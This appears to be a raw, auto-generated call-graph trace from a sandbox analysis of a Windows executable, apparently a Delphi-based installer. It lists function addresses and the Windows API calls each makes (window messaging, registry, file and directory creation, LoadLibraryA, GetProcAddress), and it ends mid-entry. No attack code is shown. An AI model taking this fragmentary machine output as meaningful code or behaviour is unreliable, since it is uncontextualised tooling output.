53609->53610 53611 46e9b6 53610->53611 53612 45559c 5 API calls 53611->53612 53613 46e9c4 53612->53613 53614 46e93c 19 API calls 53613->53614 53615 46e9d8 53614->53615 53616 45a204 18 API calls 53615->53616 53617 46e9f0 53616->53617 53618 403420 4 API calls 53617->53618 53619 46ea0a 53618->53619 53620 403400 4 API calls 53619->53620 53621 46ea12 53620->53621 53622 46eb70 53621->53622 53623 4034e0 18 API calls 53622->53623 53624 46ebad 53623->53624 53625 46ebb6 53624->53625 53626 46ebc5 53624->53626 53627 47c26c 57 API calls 53625->53627 53628 403400 4 API calls 53626->53628 53629 46ebc3 53627->53629 53628->53629 53630 47c26c 57 API calls 53629->53630 53631 46ebe8 53630->53631 53632 46ec15 53631->53632 54041 46ea24 19 API calls 53631->54041 54038 46eb5c 53632->54038 53636 47c26c 57 API calls 53637 46ec56 53636->53637 53638 45a204 18 API calls 53637->53638 53639 46ec74 53638->53639 53640 403420 4 API calls 53639->53640 53641 46ec8e 53640->53641 53642 403420 4 API calls 53641->53642 53643 46ec9b 53642->53643 53643->53443 53645 4759e1 53644->53645 53646 4759b0 53644->53646 53648 46e4ec 53645->53648 53646->53645 53647 479630 33 API calls 53646->53647 53647->53646 53649 46e4f5 53648->53649 53650 46e4fa 53648->53650 54046 408be0 19 API calls 53649->54046 54042 4244ac 53650->54042 53654 46e512 53656 4759f4 53654->53656 53657 475a37 53656->53657 53658 475a04 53656->53658 53657->53450 53658->53657 53659 479630 33 API calls 53658->53659 53659->53658 53661 474cfd 53660->53661 53665 474c4b 53660->53665 53662 403400 4 API calls 53661->53662 53663 474d12 53662->53663 53663->53459 53664 479630 33 API calls 53664->53665 53665->53661 53665->53664 53668 474c9b 53665->53668 54080 47e1b8 53665->54080 54084 4792a4 53665->54084 54089 4792d0 33 API calls 53665->54089 53668->53665 53669 47c26c 57 API calls 53668->53669 54087 454100 34 API calls 53668->54087 54088 454100 34 API calls 53668->54088 53669->53668 53674 474ddf 53673->53674 53681 474d4e 53673->53681 53677 479630 33 API calls 53677->53681 53680 47c26c 57 API calls 53680->53681 53681->53674 53681->53677 53681->53680 53682 45a204 18 API calls 53681->53682 53682->53681 54018->53429 54019->53430 54020->53466 54030 44fb30 54027->54030 54031 44fb41 54030->54031 54032 44fb2d 54031->54032 54033 44fb6b MulDiv 54031->54033 54032->53595 54036 4181e0 54033->54036 54035 44fb96 SendMessageA 54035->54032 54037 4181ea 54036->54037 54037->54035 54039 403494 4 API calls 54038->54039 54040 46eb6b 54039->54040 54040->53636 54041->53632 54043 4244af 54042->54043 54045 4244ba 54043->54045 54048 4243fc PeekMessageA 54043->54048 54045->53654 54047 408be0 19 API calls 54045->54047 54049 4244a0 54048->54049 54050 42441f 54048->54050 54049->54043 54050->54049 54060 4243cc 54050->54060 54059 42448a TranslateMessage DispatchMessageA 54059->54049 54061 4243f4 54060->54061 54062 4243dd 54060->54062 54061->54049 54064 424318 54061->54064 54062->54061 54079 424cb8 UnhookWindowsHookEx TerminateThread KillTimer IsWindowVisible ShowWindow 54062->54079 54065 424362 54064->54065 54066 424328 54064->54066 54065->54049 54068 424368 54065->54068 54066->54065 54067 42434f TranslateMDISysAccel 54066->54067 54067->54065 54069 4243c4 54068->54069 54070 42437d 54068->54070 54069->54049 54076 4242f4 54069->54076 54070->54069 54071 424385 GetCapture 54070->54071 54071->54069 54072 42438e 54071->54072 54073 4243a7 SendMessageA 54072->54073 54075 4243a0 54072->54075 54073->54069 54074 4243c2 54073->54074 54074->54069 54075->54073 54077 424307 IsDialogMessage 54076->54077 54078 424314 54076->54078 54077->54078 54078->54049 54078->54059 54079->54061 54081 47e25f 54080->54081 54082 47e1cc 54080->54082 54081->53665 54082->54081 54090 457470 29 API calls 54082->54090 54091 479200 54084->54091 54087->53668 54088->53665 54089->53665 54090->54081 54092 479234 54091->54092 54093 47920c 54091->54093 54092->53665 54094 47922d 54093->54094 54097 453344 18 API calls 54093->54097 54098 4790c0 33 API calls 54094->54098 54097->54094 54098->54092 55146 431eec 55111->55146 55113 43d9f2 55114 403400 4 API calls 55113->55114 55115 43da76 55114->55115 55115->52997 55115->52998 55117 4948cd 55116->55117 55120 494812 55116->55120 55123 494910 55117->55123 55118 433d6c 18 API calls 55118->55120 55120->55117 55120->55118 55121 431ca0 18 API calls 55120->55121 55122 403450 18 API calls 55120->55122 55151 408c0c 18 API calls 55120->55151 55121->55120 55122->55120 55124 49492c 55123->55124 55152 433d6c 55124->55152 55126 494931 55127 431ca0 18 API calls 55126->55127 55128 49493c 55127->55128 55129 43d594 55128->55129 55130 43d5c1 55129->55130 55135 43d5b3 55129->55135 55130->53008 55131 43d63d 55142 43d6f7 55131->55142 55155 447084 55131->55155 55133 43d688 55161 43dd50 55133->55161 55135->55130 55135->55131 55136 447084 18 API calls 55135->55136 55136->55135 55137 43d8fd 55137->55130 55181 447024 18 API calls 55137->55181 55139 43d8de 55180 447024 18 API calls 55139->55180 55142->55137 55142->55139 55179 447024 18 API calls 55142->55179 55143->53010 55144->53012 55145->52999 55147 403494 4 API calls 55146->55147 55148 431efb 55147->55148 55149 431f25 55148->55149 55150 403744 18 API calls 55148->55150 55149->55113 55150->55148 55151->55120 55153 402648 18 API calls 55152->55153 55154 433d7b 55153->55154 55154->55126 55156 4470a3 55155->55156 55157 4470aa 55155->55157 55182 446e30 18 API calls 55156->55182 55159 431ca0 18 API calls 55157->55159 55160 4470ba 55159->55160 55160->55133 55162 43dd6c 55161->55162 55167 43dd99 55161->55167 55163 402660 4 API calls 55162->55163 55162->55167 55163->55162 55164 43ddce 55164->55142 55166 43fea5 55166->55164 55192 447024 18 API calls 55166->55192 55167->55164 55167->55166 55168 43c938 18 API calls 55167->55168 55170 447024 18 API calls 55167->55170 55172 431c40 18 API calls 55167->55172 55175 433d18 18 API calls 55167->55175 55176 436650 18 API calls 55167->55176 55177 433b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55167->55177 55178 446e30 18 API calls 55167->55178 55183 4396e0 55167->55183 55189 436e4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55167->55189 55190 43dc48 32 API calls 55167->55190 55191 433d34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55167->55191 55168->55167 55170->55167 55172->55167 55175->55167 55176->55167 55177->55167 55178->55167 55179->55142 55180->55137 55181->55137 55182->55157 55184 4396e9 55183->55184 55185 403400 4 API calls 55184->55185 55186 43c8e8 55185->55186 55193 403a38 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55186->55193 55188 43c8fa 55188->55167 55189->55167 55190->55167 55191->55167 55192->55166 55193->55188 55194 41fb58 55195 41fb61 55194->55195 55198 41fdfc 55195->55198 55197 41fb6e 55199 41feee 55198->55199 55200 41fe13 55198->55200 55199->55197 55200->55199 55219 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 55200->55219 55202 41fe49 55203 41fe73 55202->55203 55204 41fe4d 55202->55204 55229 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 55203->55229 55220 41fb9c 55204->55220 55207 41fe81 55209 41fe85 55207->55209 55210 41feab 55207->55210 55212 41fb9c 10 API calls 55209->55212 55213 41fb9c 10 API calls 55210->55213 55211 41fb9c 10 API calls 55218 41fe71 55211->55218 55214 41fe97 55212->55214 55215 41febd 55213->55215 55216 41fb9c 10 API calls 55214->55216 55217 41fb9c 10 API calls 55215->55217 55216->55218 55217->55218 55218->55197 55219->55202 55221 41fbb7 55220->55221 55222 41f93c 4 API calls 55221->55222 55223 41fbcd 55221->55223 55222->55223 55230 41f93c 55223->55230 55225 41fc15 55226 41fc38 SetScrollInfo 55225->55226 55238 41fa9c 55226->55238 55229->55207 55231 4181e0 55230->55231 55232 41f959 GetWindowLongA 55231->55232 55233 41f996 55232->55233 55234 41f976 55232->55234 55250 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 55233->55250 55249 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 55234->55249 55237 41f982 55237->55225 55239 41fab2 55238->55239 55240 41faaa 55238->55240 55241 41faef 55239->55241 55242 41faf1 55239->55242 55243 41fae1 55239->55243 55240->55211 55244 41fb31 GetScrollPos 55241->55244 55252 417e48 IsWindowVisible ScrollWindow SetWindowPos 55242->55252 55251 417e48 IsWindowVisible ScrollWindow SetWindowPos 55243->55251 55244->55240 55247 41fb3c 55244->55247 55248 41fb4b SetScrollPos 55247->55248 55248->55240 55249->55237 55250->55237 55251->55241 55252->55241 55253 420598 55254 4205ab 55253->55254 55274 415b30 55254->55274 55256 4205e6 55257 4206f2 55256->55257 55258 420651 55256->55258 55267 420642 MulDiv 55256->55267 55261 420709 55257->55261 55281 4146d4 KiUserCallbackDispatcher 55257->55281 55279 420848 34 API calls 55258->55279 55260 420720 55264 420742 55260->55264 55283 420060 12 API calls 55260->55283 55261->55260 55282 414718 KiUserCallbackDispatcher 55261->55282 55266 42066a 55266->55257 55280 420060 12 API calls 55266->55280 55278 41a304 19 API calls 55267->55278 55270 420687 55271 4206a3 MulDiv 55270->55271 55272 4206c6 55270->55272 55271->55272 55272->55257 55273 4206cf MulDiv 55272->55273 55273->55257 55275 415b42 55274->55275 55284 414470 55275->55284 55277 415b5a 55277->55256 55278->55258 55279->55266 55280->55270 55281->55261 55282->55260 55283->55264 55285 41448a 55284->55285 55288 410458 55285->55288 55287 4144a0 55287->55277 55291 40dca4 55288->55291 55290 41045e 55290->55287 55292 40dd06 55291->55292 55293 40dcb7 55291->55293 55298 40dd14 55292->55298 55296 40dd14 33 API calls 55293->55296 55297 40dce1 55296->55297 55297->55290 55299 40dd24 55298->55299 55301 40dd3a 55299->55301 55310 40e09c 55299->55310 55326 40d5e0 55299->55326 55329 40df4c 55301->55329 55304 40d5e0 19 API calls 55305 40dd42 55304->55305 55305->55304 55306 40ddae 55305->55306 55332 40db60 55305->55332 55307 40df4c 19 API calls 55306->55307 55309 40dd10 55307->55309 55309->55290 55311 40e96c 19 API calls 55310->55311 55314 40e0d7 55311->55314 55312 403778 18 API calls 55312->55314 55313 40e18d 55315 40e1b7 55313->55315 55316 40e1a8 55313->55316 55314->55312 55314->55313 55400 40d774 19 API calls 55314->55400 55401 40e080 19 API calls 55314->55401 55397 40ba24 55315->55397 55346 40e3c0 55316->55346 55322 40e1b5 55323 403400 4 API calls 55322->55323 55324 40e25c 55323->55324 55324->55299 55327 40ea08 19 API calls 55326->55327 55328 40d5ea 55327->55328 55328->55299 55434 40d4bc 55329->55434 55333 40df54 19 API calls 55332->55333 55334 40db93 55333->55334 55335 40e96c 19 API calls 55334->55335 55336 40db9e 55335->55336 55337 40e96c 19 API calls 55336->55337 55338 40dba9 55337->55338 55339 40dbc4 55338->55339 55340 40dbbb 55338->55340 55344 40dbc1 55338->55344 55443 40d9d8 55339->55443 55446 40dac8 33 API calls 55340->55446 55343 403420 4 API calls 55345 40dc8f 55343->55345 55344->55343 55345->55305 55347 40e3f6 55346->55347 55348 40e3ec 55346->55348 55350 40e511 55347->55350 55351 40e495 55347->55351 55352 40e4f6 55347->55352 55353 40e576 55347->55353 55354 40e438 55347->55354 55355 40e4d9 55347->55355 55356 40e47a 55347->55356 55357 40e4bb 55347->55357 55388 40e45c 55347->55388 55403 40d440 19 API calls 55348->55403 55358 40d764 19 API calls 55350->55358 55411 40de24 19 API calls 55351->55411 55416 40e890 19 API calls 55352->55416 55362 40d764 19 API calls 55353->55362 55404 40d764 55354->55404 55414 40e9a8 19 API calls 55355->55414 55410 40d818 19 API calls 55356->55410 55413 40dde4 19 API calls 55357->55413 55367 40e519 55358->55367 55361 403400 4 API calls 55368 40e5eb 55361->55368 55369 40e57e 55362->55369 55373 40e523 55367->55373 55374 40e51d 55367->55374 55368->55322 55375 40e582 55369->55375 55376 40e59b 55369->55376 55370 40e4e4 55415 409d38 18 API calls 55370->55415 55372 40e4a0 55412 40d470 19 API calls 55372->55412 55417 40ea08 55373->55417 55382 40e521 55374->55382 55383 40e53c 55374->55383 55385 40ea08 19 API calls 55375->55385 55423 40de24 19 API calls 55376->55423 55378 40e461 55409 40ded8 19 API calls 55378->55409 55379 40e444 55407 40de24 19 API calls 55379->55407 55421 40de24 19 API calls 55382->55421 55389 40ea08 19 API calls 55383->55389 55385->55388 55388->55361 55392 40e544 55389->55392 55390 40e44f 55408 40e26c 19 API calls 55390->55408 55420 40d8a0 19 API calls 55392->55420 55394 40e566 55422 40e2d4 18 API calls 55394->55422 55429 40b9d0 55397->55429 55400->55314 55401->55314 55402 40d774 19 API calls 55402->55322 55403->55347 55405 40ea08 19 API calls 55404->55405 55406 40d76e 55405->55406 55406->55378 55406->55379 55407->55390 55408->55388 55409->55388 55410->55388 55411->55372 55412->55388 55413->55388 55414->55370 55415->55388 55416->55388 55424 40d780 55417->55424 55420->55388 55421->55394 55422->55388 55423->55388 55427 40d78b 55424->55427 55425 40d7c5 55425->55388 55427->55425 55428 40d7cc 19 API calls 55427->55428 55428->55427 55430 40b9e2 55429->55430 55432 40ba07 55429->55432 55430->55432 55433 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55430->55433 55432->55322 55432->55402 55433->55432 55435 40ea08 19 API calls 55434->55435 55436 40d4c9 55435->55436 55437 40d4dc 55436->55437 55441 40eb0c 19 API calls 55436->55441 55437->55305 55439 40d4d7 55442 40d458 19 API calls 55439->55442 55441->55439 55442->55437 55447 40ab7c 33 API calls 55443->55447 55445 40da00 55445->55344 55446->55344 55447->55445 55448 41363c SetWindowLongA GetWindowLongA 55449 413699 SetPropA SetPropA 55448->55449 55450 41367b GetWindowLongA 55448->55450 55455 41f39c 55449->55455 55450->55449 55451 41368a SetWindowLongA 55450->55451 55451->55449 55460 415270 55455->55460 55467 423c0c 55455->55467 55561 423a84 55455->55561 55456 4136e9 55461 41527d 55460->55461 55462 4152e3 55461->55462 55463 4152d8 55461->55463 55466 4152e1 55461->55466 55568 424b8c 13 API calls 55462->55568 55463->55466 55569 41505c 60 API calls 55463->55569 55466->55456 55470 423c42 55467->55470 55488 423c63 55470->55488 55570 423b68 55470->55570 55471 423cec 55473 423cf3 55471->55473 55474 423d27 55471->55474 55472 423c8d 55475 423c93 55472->55475 55476 423d50 55472->55476 55481 423cf9 55473->55481 55520 423fb1 55473->55520 55477 423d32 55474->55477 55478 42409a IsIconic 55474->55478 55482 423cc5 55475->55482 55483 423c98 55475->55483 55479 423d62 55476->55479 55480 423d6b 55476->55480 55486 4240d6 55477->55486 55487 423d3b 55477->55487 55478->55488 55492 4240ae GetFocus 55478->55492 55489 423d78 55479->55489 55490 423d69 55479->55490 55577 424194 11 API calls 55480->55577 55493 423f13 SendMessageA 55481->55493 55494 423d07 55481->55494 55482->55488 55510 423cde 55482->55510 55511 423e3f 55482->55511 55484 423df6 55483->55484 55485 423c9e 55483->55485 55582 423b84 NtdllDefWindowProc_A 55484->55582 55499 423ca7 55485->55499 55500 423e1e PostMessageA 55485->55500 55591 424850 WinHelpA PostMessageA 55486->55591 55496 4240ed 55487->55496 55512 423cc0 55487->55512 55488->55456 55497 4241dc 11 API calls 55489->55497 55578 423b84 NtdllDefWindowProc_A 55490->55578 55492->55488 55498 4240bf 55492->55498 55493->55488 55494->55488 55494->55512 55540 423f56 55494->55540 55508 4240f6 55496->55508 55509 42410b 55496->55509 55497->55488 55590 41eff4 GetCurrentThreadId EnumThreadWindows 55498->55590 55505 423cb0 55499->55505 55506 423ea5 55499->55506 55583 423b84 NtdllDefWindowProc_A 55500->55583 55515 423cb9 55505->55515 55516 423dce IsIconic 55505->55516 55517 423eae 55506->55517 55518 423edf 55506->55518 55507 423e39 55507->55488 55519 4244d4 19 API calls 55508->55519 55592 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 55509->55592 55510->55512 55521 423e0b 55510->55521 55574 423b84 NtdllDefWindowProc_A 55511->55574 55512->55488 55576 423b84 NtdllDefWindowProc_A 55512->55576 55514 4240c6 55514->55488 55526 4240ce SetFocus 55514->55526 55515->55512 55527 423d91 55515->55527 55529 423dea 55516->55529 55530 423dde 55516->55530 55585 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 55517->55585 55575 423b84 NtdllDefWindowProc_A 55518->55575 55519->55488 55520->55488 55537 423fd7 IsWindowEnabled 55520->55537 55524 424178 26 API calls 55521->55524 55524->55488 55525 423e45 55534 423e83 55525->55534 55535 423e61 55525->55535 55526->55488 55527->55488 55579 422c4c ShowWindow PostMessageA PostQuitMessage 55527->55579 55581 423b84 NtdllDefWindowProc_A 55529->55581 55580 423bc0 29 API calls 55530->55580 55533 423ee5 55539 423efd 55533->55539 55546 41eea4 2 API calls 55533->55546 55542 423a84 6 API calls 55534->55542 55584 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 55535->55584 55536 423eb6 55544 423ec8 55536->55544 55551 41ef58 6 API calls 55536->55551 55537->55488 55545 423fe5 55537->55545 55547 423a84 6 API calls 55539->55547 55540->55488 55548 423f78 IsWindowEnabled 55540->55548 55550 423e8b PostMessageA 55542->55550 55586 423b84 NtdllDefWindowProc_A 55544->55586 55554 423fec IsWindowVisible 55545->55554 55546->55539 55547->55488 55548->55488 55553 423f86 55548->55553 55549 423e69 PostMessageA 55549->55488 55550->55488 55551->55544 55587 412310 21 API calls 55553->55587 55554->55488 55556 423ffa GetFocus 55554->55556 55557 4181e0 55556->55557 55558 42400f SetFocus 55557->55558 55588 415240 55558->55588 55562 423a94 55561->55562 55564 423b0d 55561->55564 55563 423a9a EnumWindows 55562->55563 55562->55564 55563->55564 55565 423ab6 GetWindow GetWindowLongA 55563->55565 55593 423a1c GetWindow 55563->55593 55564->55456 55566 423ad5 55565->55566 55566->55564 55567 423b01 SetWindowPos 55566->55567 55567->55564 55567->55566 55568->55466 55569->55466 55571 423b72 55570->55571 55572 423b7d 55570->55572 55571->55572 55573 408720 21 API calls 55571->55573 55572->55471 55572->55472 55573->55572 55574->55525 55575->55533 55576->55488 55577->55488 55578->55488 55579->55488 55580->55488 55581->55488 55582->55488 55583->55507 55584->55549 55585->55536 55586->55488 55587->55488 55589 41525b SetFocus 55588->55589 55589->55488 55590->55514 55591->55507 55592->55507 55594 423a3d GetWindowLongA 55593->55594 55595 423a49 55593->55595 55594->55595 55596 4809f7 55597 480a00 55596->55597 55598 480a2b 55596->55598 55597->55598 55599 480a1d 55597->55599 55601 480a6a 55598->55601 55970 47f4a4 18 API calls 55598->55970 55968 476c50 203 API calls 55599->55968 55602 480a8e 55601->55602 55606 480a81 55601->55606 55607 480a83 55601->55607 55609 480aca 55602->55609 55610 480aac 55602->55610 55604 480a22 55604->55598 55969 408be0 19 API calls 55604->55969 55605 480a5d 55971 47f50c 56 API calls 55605->55971 55613 47f4e8 56 API calls 55606->55613 55972 47f57c 56 API calls 55607->55972 55975 47f33c 38 API calls 55609->55975 55614 480ac1 55610->55614 55973 47f50c 56 API calls 55610->55973 55613->55602 55974 47f33c 38 API calls 55614->55974 55616 480ac8 55619 480ada 55616->55619 55620 480ae0 55616->55620 55621 480ade 55619->55621 55624 47f4e8 56 API calls 55619->55624 55620->55621 55622 47f4e8 56 API calls 55620->55622 55722 47c66c 55621->55722 55622->55621 55624->55621 55625 480b07 55796 47cb94 55625->55796 55630 480b21 55632 480b31 55630->55632 55868 47f8d0 55630->55868 55634 480b88 55632->55634 55888 4502c0 55632->55888 55893 47fc70 55634->55893 55637 480b8d 55638 480b9a 55637->55638 55639 480cdd 55637->55639 55898 494b50 55638->55898 55641 47fb8c 32 API calls 55639->55641 55640 480b52 55640->55634 55648 4314f8 18 API calls 55640->55648 55643 480cdb 55641->55643 55646 47c26c 57 API calls 55643->55646 55649 480cfc 55646->55649 55648->55634 55652 403450 18 API calls 55649->55652 55723 42d898 GetWindowsDirectoryA 55722->55723 55724 47c690 55723->55724 55725 403450 18 API calls 55724->55725 55726 47c69d 55725->55726 55727 42d8c4 GetSystemDirectoryA 55726->55727 55728 47c6a5 55727->55728 55729 403450 18 API calls 55728->55729 55730 47c6b2 55729->55730 55731 42d8f0 6 API calls 55730->55731 55732 47c6ba 55731->55732 55733 403450 18 API calls 55732->55733 55734 47c6c7 55733->55734 55735 47c6d0 55734->55735 55736 47c6ec 55734->55736 56007 42d208 55735->56007 55737 403400 4 API calls 55736->55737 55740 47c6ea 55737->55740 55742 47c731 55740->55742 55743 42c8cc 19 API calls 55740->55743 55741 403450 18 API calls 55741->55740 55987 47c4f4 55742->55987 55745 47c70c 55743->55745 55748 403450 18 API calls 55745->55748 55747 403450 18 API calls 55749 47c74d 55747->55749 55750 47c719 55748->55750 55751 47c76b 55749->55751 55752 4035c0 18 API calls 55749->55752 55750->55742 55754 403450 18 API calls 55750->55754 55753 47c4f4 22 API calls 55751->55753 55752->55751 55755 47c77a 55753->55755 55754->55742 55756 403450 18 API calls 55755->55756 55757 47c787 55756->55757 55758 47c7af 55757->55758 55759 42c3fc 19 API calls 55757->55759 55760 47c816 55758->55760 55763 47c4f4 22 API calls 55758->55763 55761 47c79d 55759->55761 55762 47c8de 55760->55762 55768 47c836 SHGetKnownFolderPath 55760->55768 55767 4035c0 18 API calls 55761->55767 55765 47c8e7 55762->55765 55766 47c908 55762->55766 55764 47c7c7 55763->55764 55769 403450 18 API calls 55764->55769 55770 42c3fc 19 API calls 55765->55770 55771 42c3fc 19 API calls 55766->55771 55767->55758 55772 47c850 55768->55772 55773 47c88b SHGetKnownFolderPath 55768->55773 55775 47c7d4 55769->55775 55777 47c8f4 55770->55777 55778 47c915 55771->55778 56017 403ba4 21 API calls 55772->56017 55773->55762 55776 47c8a5 55773->55776 55780 47c7e7 55775->55780 56015 453344 18 API calls 55775->56015 56018 403ba4 21 API calls 55776->56018 55782 4035c0 18 API calls 55777->55782 55783 4035c0 18 API calls 55778->55783 55779 47c86b CoTaskMemFree 55779->55625 55787 47c4f4 22 API calls 55780->55787 55784 47c906 55782->55784 55783->55784 55998 47c5d8 55784->55998 55786 47c8c0 CoTaskMemFree 55786->55625 55789 47c7f6 55787->55789 55791 403450 18 API calls 55789->55791 55793 47c803 55791->55793 55792 403400 4 API calls 55794 47c941 55792->55794 55793->55760 56016 453344 18 API calls 55793->56016 55794->55625 55797 47cb9c 55796->55797 55797->55797 56020 453a24 55797->56020 55800 403450 18 API calls 55801 47cbc9 55800->55801 55802 403494 4 API calls 55801->55802 55803 47cbd6 55802->55803 55804 40357c 18 API calls 55803->55804 55805 47cbe4 55804->55805 55806 457d10 38 API calls 55805->55806 55807 47cbec 55806->55807 55808 47cbff 55807->55808 56050 457508 20 API calls 55807->56050 55810 42c3fc 19 API calls 55808->55810 55811 47cc0c 55810->55811 55812 4035c0 18 API calls 55811->55812 55813 47cc1c 55812->55813 55814 47cc26 CreateDirectoryA 55813->55814 55815 47cc30 GetLastError 55814->55815 55837 47cc8c 55814->55837 55817 451458 18 API calls 55815->55817 55819 47cc48 55817->55819 55818 47cc99 55820 47ccc2 55818->55820 55824 4035c0 18 API calls 55818->55824 56051 406d68 33 API calls 55819->56051 55823 403420 4 API calls 55820->55823 55822 47cc58 55825 42e8c8 19 API calls 55822->55825 55826 47ccdc 55823->55826 55827 47ccaf 55824->55827 55828 47cc68 55825->55828 55829 403420 4 API calls 55826->55829 56045 47cb3c 55827->56045 55831 451428 18 API calls 55828->55831 55832 47cce9 55829->55832 55835 47cc7d 55831->55835 55838 47ce78 55832->55838 55833 47ccba 56053 458450 18 API calls 55833->56053 56052 408c0c 18 API calls 55835->56052 56038 458410 55837->56038 55839 42c3fc 19 API calls 55838->55839 55840 47cea4 55839->55840 55841 4035c0 18 API calls 55840->55841 55842 47ceb4 55841->55842 55843 47cb3c 39 API calls 55842->55843 55844 47cec1 55843->55844 56114 4525d8 55844->56114 55847 47ceda 55849 4525d8 44 API calls 55847->55849 55850 47cee7 55849->55850 55851 47cf20 55850->55851 55852 403494 4 API calls 55850->55852 55853 42e394 2 API calls 55851->55853 55852->55851 55854 47cf2f 55853->55854 55855 42e394 2 API calls 55854->55855 55856 47cf3c 55855->55856 55857 47cf6f GetProcAddress 55856->55857 55860 4078f4 33 API calls 55856->55860 55858 47cf95 55857->55858 55859 47cf8b 55857->55859 55862 403400 4 API calls 55858->55862 56119 453344 18 API calls 55859->56119 55863 47cf67 55860->55863 55864 47cfaa 55862->55864 56118 453344 18 API calls 55863->56118 55866 403400 4 API calls 55864->55866 55867 47cfb2 55866->55867 55867->55630 55976 47f738 45 API calls 55867->55976 55869 42c3fc 19 API calls 55868->55869 55870 47f8fc 55869->55870 55871 4035c0 18 API calls 55870->55871 55872 47f90c 55871->55872 55873 47ca60 35 API calls 55872->55873 55874 47f91a 55873->55874 55875 42e394 2 API calls 55874->55875 55876 47f932 55875->55876 55877 47f965 55876->55877 55878 47f940 55876->55878 56135 45d188 GetProcAddress GetProcAddress GetProcAddress ISCryptGetVersion 55877->56135 55879 4078f4 33 API calls 55878->55879 55881 47f95d 55879->55881 55882 47f96f 55889 4502d3 GetVersion 55888->55889 55890 45037c 55888->55890 55889->55890 55891 4502e6 LoadLibraryA 55889->55891 55890->55640 55891->55890 55892 4502fe 6 API calls 55891->55892 55892->55890 55894 47fc81 55893->55894 55895 47fcbc 55894->55895 55896 47fcac 55894->55896 55895->55637 56137 47e758 6 API calls 55896->56137 55899 494b5a 55898->55899 56138 44845c 55899->56138 55968->55604 55970->55605 55971->55601 55972->55602 55973->55614 55974->55616 55975->55616 55976->55630 55988 42de1c RegOpenKeyExA 55987->55988 55989 47c51a 55988->55989 55990 47c540 55989->55990 55991 47c51e 55989->55991 55992 403400 4 API calls 55990->55992 55993 42dd4c 20 API calls 55991->55993 55994 47c547 55992->55994 55995 47c52a 55993->55995 55994->55747 55996 47c535 RegCloseKey 55995->55996 55997 403400 4 API calls 55995->55997 55996->55994 55997->55996 55999 47c5e6 55998->55999 56000 42de1c RegOpenKeyExA 55999->56000 56001 47c60e 56000->56001 56002 47c63f 56001->56002 56003 42dd4c 20 API calls 56001->56003 56002->55792 56004 47c624 56003->56004 56005 42dd4c 20 API calls 56004->56005 56006 47c636 RegCloseKey 56005->56006 56006->56002 56008 4038a4 18 API calls 56007->56008 56009 42d21b 56008->56009 56010 42d232 GetEnvironmentVariableA 56009->56010 56014 42d245 56009->56014 56019 42dbd0 18 API calls 56009->56019 56010->56009 56011 42d23e 56010->56011 56012 403400 4 API calls 56011->56012 56012->56014 56014->55741 56015->55780 56016->55760 56017->55779 56018->55786 56019->56009 56023 453a44 56020->56023 56022 4537b0 25 API calls 56022->56023 56023->56022 56024 453a69 CreateDirectoryA 56023->56024 56029 451458 18 API calls 56023->56029 56035 42e8c8 19 API calls 56023->56035 56036 451428 18 API calls 56023->56036 56054 42da18 56023->56054 56077 406d68 33 API calls 56023->56077 56078 408c0c 18 API calls 56023->56078 56025 453ae1 56024->56025 56026 453a73 GetLastError 56024->56026 56027 403494 4 API calls 56025->56027 56026->56023 56028 453aeb 56027->56028 56030 403420 4 API calls 56028->56030 56029->56023 56031 453b05 56030->56031 56033 403420 4 API calls 56031->56033 56034 453b12 56033->56034 56034->55800 56035->56023 56036->56023 56039 45841c 56038->56039 56040 45842a 56038->56040 56042 403494 4 API calls 56039->56042 56041 403400 4 API calls 56040->56041 56043 458431 56041->56043 56044 458428 56042->56044 56043->55818 56044->55818 56046 40cf4c 37 API calls 56045->56046 56047 47cb58 56046->56047 56079 47ca60 56047->56079 56049 47cb73 56049->55833 56050->55808 56051->55822 56052->55837 56053->55820 56055 42d208 19 API calls 56054->56055 56056 42da3e 56055->56056 56057 42da4a 56056->56057 56058 42cd48 21 API calls 56056->56058 56059 42d208 19 API calls 56057->56059 56061 42da96 56057->56061 56058->56057 56060 42da5a 56059->56060 56062 42da66 56060->56062 56064 42cd48 21 API calls 56060->56064 56063 42c804 19 API calls 56061->56063 56062->56061 56067 42d208 19 API calls 56062->56067 56073 42da8b 56062->56073 56066 42daa0 56063->56066 56064->56062 56065 42d898 GetWindowsDirectoryA 56065->56061 56068 42c3fc 19 API calls 56066->56068 56069 42da7f 56067->56069 56070 42daab 56068->56070 56072 42cd48 21 API calls 56069->56072 56069->56073 56071 403494 4 API calls 56070->56071 56074 42dab5 56071->56074 56072->56073 56073->56061 56073->56065 56075 403420 4 API calls 56074->56075 56076 42dacf 56075->56076 56076->56023 56077->56023 56078->56023 56086 40cda0 56079->56086 56081 47ca95 56082 403420 4 API calls 56081->56082 56083 47cb25 56082->56083 56084 403400 4 API calls 56083->56084 56085 47cb2d 56084->56085 56085->56049 56091 40cc50 56086->56091 56088 40cdba 56103 40cd88 56088->56103 56090 40cdd5 56090->56081 56092 40cc5d 56091->56092 56093 40cc79 56092->56093 56094 40ccae 56092->56094 56107 406ec0 56093->56107 56111 406e80 CreateFileA 56094->56111 56097 40cc80 56100 40cca7 56097->56100 56110 408d2c 33 API calls 56097->56110 56098 40ccb8 56098->56100 56112 408d2c 33 API calls 56098->56112 56100->56088 56102 40ccdf 56102->56100 56104 40cd90 56103->56104 56105 40cd9c 56103->56105 56113 40cab8 19 API calls 56104->56113 56105->56090 56108 403738 56107->56108 56109 406edc CreateFileA 56108->56109 56109->56097 56110->56100 56111->56098 56112->56102 56113->56105 56120 452510 56114->56120 56116 4525e5 56116->55847 56117 453344 18 API calls 56116->56117 56117->55847 56118->55857 56119->55858 56121 403738 56120->56121 56122 45252d 754B1520 56121->56122 56123 4525b2 56122->56123 56124 45253b 56122->56124 56126 4525c5 56123->56126 56133 452334 41 API calls 56123->56133 56125 402648 18 API calls 56124->56125 56127 452542 754B1500 56125->56127 56126->56116 56129 452580 56127->56129 56130 452566 754B1540 56127->56130 56131 402660 4 API calls 56129->56131 56130->56129 56132 4525aa 